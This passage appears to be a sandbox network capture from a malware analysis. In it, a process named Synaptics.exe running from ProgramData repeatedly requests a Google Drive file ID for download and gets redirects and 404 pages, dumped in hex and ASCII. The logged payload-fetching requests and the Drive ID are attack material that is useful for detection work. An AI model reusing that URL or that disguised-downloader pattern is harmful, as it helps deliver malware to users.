                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    70192.168.2.452011142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:58 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:58 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC4QGxGLAgteUquziWnVswHBg5rOhTg5B-r6i9NcOip_adMqZ-MWqs8zKLDcS1K449Or
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:58 GMT
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-9RD-z3i68lejJdlpMmaFTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:58 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:51:58 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 45 44 43 4b 36 7a 66 48 53 41 74 73 54 79 31 56 72 70 61 33 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="jEDCK6zfHSAtsTy1Vrpa3A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:51:58 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    71192.168.2.452010142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:58 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:58 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC59S1EIAYqWqKN-RL9cBEFjLtG6mGfMsfQG-9Y85kFuPfTMajTgYDTPhxcuh6jifghSnHvQ_-s
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:58 GMT
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-aO-F4N-SLdjS6NQ9pXnAXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:58 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                                    2024-12-30 10:51:58 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 78 37 64 32 46 4b 32 6b 35 48 63 39 53 4c 43 53 79 4e 5f 76 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="yx7d2FK2k5Hc9SLCSyN_vQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                                    2024-12-30 10:51:58 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    72192.168.2.452022142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:59 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:59 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:59 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-YBKGf39NrHzjAj_0Trqa3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    73192.168.2.452021142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:59 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:59 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:59 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-uFOwuI7XVKDLkY5pPq8PLQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    74192.168.2.452023142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:59 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:59 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC5OqnaIt447Nwk8v-6N1_nA0xu7WLYV7AxU9Mw8mqtu0RF-pUgfN0TmIUZwhhFnQNs9
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:59 GMT
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-j9kWynQ2lZylgIo9_aWemQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:59 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:51:59 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 6f 77 36 51 46 39 38 4a 6e 51 35 71 5f 6f 34 53 59 6c 42 69 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="Jow6QF98JnQ5q_o4SYlBiQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:51:59 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    75192.168.2.452025142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:59 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:59 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC7-ca-Ipel5fRsn8_R10BVxAzRjgKwTnHnRfJGY2M8RYIBKYSnzbvXVWfDszD9dbQPklx8OW-4
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:59 GMT
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-x6NrhEpu7vwikL1jF-Vzgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:59 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
